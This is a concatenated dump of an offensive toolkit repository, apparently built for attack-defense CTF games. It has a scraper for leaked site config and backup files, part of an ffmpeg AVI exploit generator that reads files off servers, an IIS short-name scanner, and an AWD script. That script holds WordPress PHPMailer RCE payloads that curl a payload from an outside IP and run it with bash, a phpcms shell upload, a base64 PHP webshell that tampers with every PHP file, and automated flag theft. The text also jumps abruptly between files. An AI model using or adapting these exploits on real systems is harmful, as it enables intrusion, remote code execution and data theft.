29 | },
30 | "asp": {
31 | "index.asp",
32 | "config.asp"
33 | },
34 | "aspx": {
35 | "index.aspx",
36 | "config.aspx"
37 | },
38 | "discuz": {
39 | "config/config_global.php", # discuz
40 | "config/config_ucenter.php", # discuz
41 | "uc_server/data/config.inc.php" # discuz
42 | },
43 | "dede": {
44 | "data/common.inc.php", # dede old version
45 | "include/config_base.php" # dede new version
46 | },
47 | "qibo": {
48 | "data/mysql_config.php" # qibo
49 | },
50 | "thinkphp": {
51 | "Common/Conf/config.php" # thinkphp
52 | }
53 | }
54 |
55 |
56 | def getScriptConfig(sc):
57 | if script.has_key(sc):
58 | return script[sc]
59 | else:
60 | return script['php']
61 |
62 |
63 | def downLoad(fileUrl, path="./downloads/"):
64 | try:
65 | u = urllib2.urlopen(fileUrl)
66 | #data = u.read()
67 | splitPath = fileUrl.split('/')
68 | fName = splitPath.pop()
69 | print "Downloading: %s " % (fName)
70 | start = fileUrl.find('://')+3
71 | end = fileUrl.find('/', start)
72 | urllib.urlretrieve(fileUrl, path+fileUrl[start:end]+"_"+fName)
73 | except Exception, e:
74 | print "[+]%s----%s" % (fileUrl, e)
75 |
76 |
77 | def usage():
78 | print "no usage."
79 |
80 |
81 | def main():
82 | generalBackup = getScriptConfig('general')
83 |
84 | while (True):
85 | for backup in generalBackup:
86 | for website in websites.keys():
87 | script = websites[website]
88 | downLoad(website+backup)
89 | time.sleep(interval)
90 |
91 | for backup in vimBackup:
92 | for website in websites.keys():
93 | script = websites[website]
94 | if isinstance(getScriptConfig(script), set):
95 | vimBackup = getScriptConfig(script)
96 | path = website+backup
97 | idx = path.rfind('/')
98 | downLoad(path[0:idx]+"/" + path[idx+1:]+".bak")
99 | time.sleep(interval)
100 |
101 | for backup in vimBackup:
102 | for website in websites.keys():
103 | script = websites[website]
104 | if isinstance(getScriptConfig(script), set):
105 | vimBackup = getScriptConfig(script)
106 | path = website+backup
107 | idx = path.rfind('/')
108 | downLoad(path[0:idx]+"/" + path[idx+1:]+"~")
109 | time.sleep(interval)
110 |
111 | for backup in vimBackup:
112 | for website in websites.keys():
113 | script = websites[website]
114 | if isinstance(getScriptConfig(script), set):
115 | vimBackup = getScriptConfig(script)
116 | path = website+backup
117 | idx = path.rfind('/')
118 | downLoad(path[0:idx]+"/."+path[idx+1:]+".swp")
119 | time.sleep(interval)
120 | break
121 | if __name__ == "__main__":
122 | start = time.time()
123 | main()
124 | end = time.time()
125 |
--------------------------------------------------------------------------------
/webshell/jsp/up.jsp:
--------------------------------------------------------------------------------
1 | 0:
105 | packet_size -= 16
106 | assert packet_size > 0
107 | part_size = min(packet_size, 64)
108 | packet_size -= part_size
109 | result.append(echo_block(gen_xbin_packet_header(part_size)))
110 | result.append(
111 | EXTERNAL_REFERENCE_PLAYLIST.format(
112 | size=part_size,
113 | offset=offset,
114 | filename=filename))
115 | offset += part_size
116 | return ''.join(result), offset
117 |
118 |
119 | def gen_xbin_playlist(filename_to_read):
120 | pls = [echo_block(XBIN_HEADER)]
121 | next_delta = 5
122 | for max_offs, filename in (
123 | (5000, filename_to_read), (500, "file:///dev/zero")):
124 | offset = 0
125 | while offset < max_offs:
126 | for _ in range(10):
127 | pls_part, new_offset = gen_xbin_packet_playlist(
128 | filename, offset, 0xf0 - next_delta)
129 | pls.append(pls_part)
130 | next_delta = 0
131 | offset = new_offset
132 | pls.append(SYNC)
133 | return FULL_PLAYLIST.format(content=''.join(pls), rand=''.join(
134 | random.choice(string.ascii_lowercase) for i in range(30)))
135 |
136 |
137 | if __name__ == "__main__":
138 | parser = argparse.ArgumentParser('AVI+M3U+XBIN ffmpeg exploit generator')
139 | parser.add_argument(
140 | 'filename',
141 | help='filename to be read from the server (prefix it with "file://")')
142 | parser.add_argument('output_avi', help='where to save the avi')
143 | args = parser.parse_args()
144 | assert '://' in args.filename, "ffmpeg needs explicit proto (forgot file://?)"
145 | content = gen_xbin_playlist(args.filename)
146 | avi = make_playlist_avi(content)
147 | output_name = args.output_avi
148 |
149 | with open(output_name, 'wb') as f:
150 | f.write(avi)
--------------------------------------------------------------------------------
/tools/iis_shortname_Scan.py:
--------------------------------------------------------------------------------
1 | # encoding=gbk
2 | # An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com
3 |
4 | import sys
5 | import httplib
6 | import urlparse
7 | import string
8 | import threading
9 | import Queue
10 | import time
11 | import string
12 |
13 |
14 | class Scanner():
15 | def __init__(self, target):
16 | self.target = target
17 | self.scheme, self.netloc, self.path, params, query, fragment = \
18 | urlparse.urlparse(target)
19 | if self.path[-1:] != '/': # ends with slash
20 | self.path += '/'
21 | self.payloads = list('abcdefghijklmnopqrstuvwxyz0123456789_-')
22 | self.files = []
23 | self.dirs = []
24 | self.queue = Queue.Queue()
25 | self.lock = threading.Lock()
26 | self.threads = []
27 |
28 |
29 | def _conn(self):
30 | try:
31 | if self.scheme == 'https':
32 | conn = httplib.HTTPSConnection(self.netloc)
33 | else:
34 | conn = httplib.HTTPConnection(self.netloc)
35 | return conn
36 | except Exception, e:
37 | print '[Exception in function _conn]', e
38 | return None
39 |
40 | # fetch http response status code
41 | def _get_status(self, path):
42 | try:
43 | conn = self._conn()
44 | conn.request('GET', path)
45 | status = conn.getresponse().status
46 | conn.close()
47 | return status
48 | except Exception, e:
49 | raise Exception('[Exception in function _get_status] %s' % str(e) )
50 |
51 | # test weather the server is vulerable
52 | def is_vul(self):
53 | try:
54 | status_1 = self._get_status(self.path + '/*~1****/a.aspx') # an existed file/folder
55 | status_2 = self._get_status(self.path + '/l1j1e*~1****/a.aspx') # not existed file/folder
56 | if status_1 == 404 and status_2 == 400:
57 | return True
58 | return False
59 | except Exception, e:
60 | raise Exception('[Exception in function is_val] %s' % str(e) )
61 |
62 | def run(self):
63 | # start from root path
64 | for payload in self.payloads:
65 | self.queue.put( (self.path + payload, '****') ) # filename, extention
66 | for i in range(10):
67 | t = threading.Thread(target=self._scan_worker)
68 | self.threads.append(t)
69 | t.start()
70 |
71 | def report(self):
72 | for t in self.threads:
73 | t.join()
74 | self._print('-'* 64)
75 | for d in self.dirs:
76 | self._print('Dir: ' + d)
77 | for f in self.files:
78 | self._print('File: ' + f)
79 | self._print('-'*64)
80 | self._print('%d Directories, %d Files found in toal' % (len(self.dirs), len(self.files)) )
81 |
82 |
83 | def _print(self, msg):
84 | self.lock.acquire()
85 | print msg
86 | self.lock.release()
87 |
88 | def _scan_worker(self):
89 | while True:
90 | try:
91 | url, ext = self.queue.get(timeout=3)
92 | status = self._get_status(url + '*~1' + ext + '/1.aspx')
93 | if status == 404:
94 | self._print('Found ' + url + ext + '\t[scan in progress]')
95 |
96 | if len(url) - len(self.path)< 6: # enum first 6 chars only
97 | for payload in self.payloads:
98 | self.queue.put( (url + payload, ext) )
99 | else:
100 | if ext == '****': # begin to scan extention
101 | for payload in string.ascii_lowercase:
102 | self.queue.put( (url, '*' + payload + '**') )
103 | self.queue.put( (url,'') ) # also it can be a folder
104 | elif ext.count('*') == 3:
105 | for payload in string.ascii_lowercase:
106 | self.queue.put( (url, '*' + ext[1] + payload + '*') )
107 | elif ext.count('*') == 2:
108 | for payload in string.ascii_lowercase:
109 | self.queue.put( (url, '*' + ext[1] + ext[2] + payload ) )
110 | elif ext == '':
111 | self.dirs.append(url + '~1')
112 | self._print('Found Dir ' + url + '~1\t[Done]')
113 |
114 | elif ext.count('*') == 1:
115 | self.files.append(url + '~1.' + ext[1:])
116 | self._print('Found File ' + url + '~1.' + ext[1:] + '\t[Done]')
117 | except Exception,e:
118 | break
119 |
120 |
121 |
122 | if len(sys.argv) == 1:
123 | print 'Usage: %s target' % sys.argv[0]
124 | sys.exit()
125 |
126 | file = sys.argv[1]
127 | fobj = open(file,'r')
128 | fileHandle = open('vul.txt','a+')
129 | for target in fobj:
130 | print target.strip()
131 | s = Scanner(target.strip())
132 | if not s.is_vul():
133 | print 'NO vulerable'
134 | #sys.exit(0)
135 | else:
136 | fileHandle.write(target)
137 | print 'server is vulerable'
138 | #s.run()
139 | #s.report()
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/awd/fuck.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import requests
3 | import re
4 | import time
5 |
6 | req = None
7 |
8 | TOKEN = ""
9 | SUBMIT_URL = "http://192.168.80.1/lms/portal/sp/hz_flag.php"
10 | SUBMIT_U = ""
11 | SUBMIT_P = ""
12 |
13 | URLS = ['40.10.10.57',
14 | '40.10.10.26',
15 | '40.10.10.11',
16 | '40.10.10.62',
17 | '40.10.10.47',
18 | '40.10.10.42',
19 | '40.10.10.15',
20 | ]
21 |
22 |
23 | def poc(url):
24 | shellurl = url
25 | return shellurl
26 |
27 |
28 | def poc_eval_backdoor_getflag_1(shellurl):
29 | data = {
30 | "s": evalcode
31 | }
32 | res = requests.post(shellurl, data=data, timeout=5)
33 | if res.status_code == 200:
34 | print res.content
35 | return res.content
36 |
37 |
38 | def generate_command(command):
39 | command = '${run{%s}}' % command
40 | command = command.replace('/', '${substr{0}{1}{$spool_directory}}')
41 | command = command.replace(' ', '${substr{10}{1}{$tod_log}}')
42 | return 'target(any -froot@localhost -be %s null)' % command
43 |
44 |
45 | def poc_wordpress_phpmail_rce_shell(url):
46 | target = 'http://{}'.format(url)
47 | shell_url = '115.159.196.171/rce.txt'
48 | user = 'admin'
49 | data = {
50 | 'user_login': user,
51 | 'redirect_to': '',
52 | 'wp-submit': 'Get New Password'
53 | }
54 | headers = {
55 | 'Host': generate_command('/usr/bin/curl -o /tmp/rce ' + shell_url),
56 | 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
57 | }
58 | target += '/wp-login.php?action=lostpassword'
59 | requests.post(target, headers=headers, data=data, allow_redirects=False)
60 | headers['Host'] = generate_command('/bin/bash /tmp/rce')
61 | requests.post(target, headers=headers, data=data, allow_redirects=False)
62 |
63 |
64 | def poc_wordpress_phpmail_shell(url):
65 | shellpath = ''
66 | shellurl = ''
67 | target = 'http://{}'.format(url)
68 | shell_url = '115.159.196.171/shell.txt'
69 | user = 'admin'
70 | data = {
71 | 'user_login': user,
72 | 'redirect_to': '',
73 | 'wp-submit': 'Get New Password'
74 | }
75 | headers = {
76 | 'Host': generate_command('/usr/bin/curl -o ' + shellpath + ' ' + shell_url),
77 | 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
78 | }
79 | target += '/wp-login.php?action=lostpassword'
80 | requests.post(target, headers=headers, data=data, allow_redirects=False)
81 | return shellurl
82 |
83 |
84 | def poc_phpcms_reg_shell(url):
85 | u = '{}/index.php?m=member&c=index&a=register&siteid=1'.format(url)
86 | data = {
87 | 'siteid': '1',
88 | 'modelid': '1',
89 | 'username': 'test',
90 | 'password': 'testxx',
91 | 'email': 'test@test.com',
92 | 'info[content]': '',
93 | 'dosubmit': '1',
94 | }
95 | rep = requests.post(u, data=data)
96 | print(rep.content)
97 | shell = ''
98 | re_result = re.findall(r'<img src=(.*)>', rep.content)
99 | if len(re_result):
100 | shell = re_result[0]
101 | return shell
102 |
103 |
104 | def custom_shell_getflag(ip, evalcode=""):
105 | shellurl = 'http://{}/shell.php'.format(ip)
106 | if not evalcode:
107 | evalcode = "echo file_get_contents('/home/flag');"
108 | data = {
109 | "s": evalcode
110 | }
111 | res = requests.post(shellurl + "?v=virinkshell", data=data, timeout=5)
112 | if res.status_code == 200:
113 | print res.content
114 | return res.content
115 |
116 |
117 | def custom_shell_add_shell(ip, ):
118 | shellurl = 'http://{}/shell.php'.format(ip)
119 | shellcode = custom_shell_code()
120 | code = "file_put_contents('/path/shell.php',base64_decode('{}'));".format(shellcode)
121 | data = {
122 | "s": evalcode
123 | }
124 | res = requests.post(shellurl + "?v=virinkshell", data=data, timeout=5)
125 | if res.status_code == 200:
126 | print res.content
127 | return res.content
128 |
129 |
130 | def custom_shell_code():
131 | shell_code = "PD9waHAKc2V0X3RpbWVfbGltaXQoMCk7Cmlnbm9yZV91c2VyX2Fib3J0KDEpOwp1bmxpbmsoX19GSUxFX18pOwpmdW5jdGlvbiBnZXRmaWxlcygkcGF0aCl7CiAgICBmb3JlYWNoKGdsb2IoJHBhdGgpIGFzICRhZmlsZSl7CiAgICAgICAgaWYoaXNfZGlyKCRhZmlsZSkpCiAgICAgICAgICBnZXRmaWxlcygkYWZpbGUuJy8qLnBocCcpOwogICAgICAgIGVsc2UKICAgICAgICAgIGZpbGVfcHV0X2NvbnRlbnRzKCRhZmlsZSwnPD9waHAgZWNobyAiPj4+Ii5maWxlX2dldF9jb250ZW50KCIvcGF0aC9mbGFnIikuIjw8PCI7Pz4nLEZJTEVfQVBQRU5EKTsKICAgIH0KfQpnZXRmaWxlcygnL3Zhci93d3cvaHRtbCcpOwo/Pg=="
132 | return shell_code
133 |
134 |
135 | def login():
136 | data = {
137 | "username": "HZ8",
138 | "password": "123456",
139 | "testcookie": "1",
140 | "indexPage": "portal/sp/index.php"
141 | }
142 | res = req.post('http://192.168.80.1/lms/portal/sp/login.php',
143 | data=data, timeout=5)
144 | if res.status_code == 200:
145 | html = res.content
146 | print html
147 |
148 |
149 | def submit(flag, ip):
150 | data = {
151 | "melee_flag": flag,
152 | "melee_ip": ip
153 | }
154 | res = req.post(SUBMIT_URL, data=data, timeout=5)
155 | if res.status_code == 200:
156 | print res.content
157 |
158 |
159 | if __name__ == '__main__':
160 | # req = requests.session()
161 | # login()
162 | #
163 | req = requests.session()
164 | login()
165 | for ip in URLS:
166 | try:
167 | su = 'http://{}/index.php'.format(ip)
168 | flag = poc_eval_backdoor_getflag_1(su)
169 | print ip, flag
170 | submit(flag, ip)
171 | time.sleep(1)
172 | except Exception, e:
173 | print e
174 | pass
175 | time.sleep(60 * 20)
176 |
--------------------------------------------------------------------------------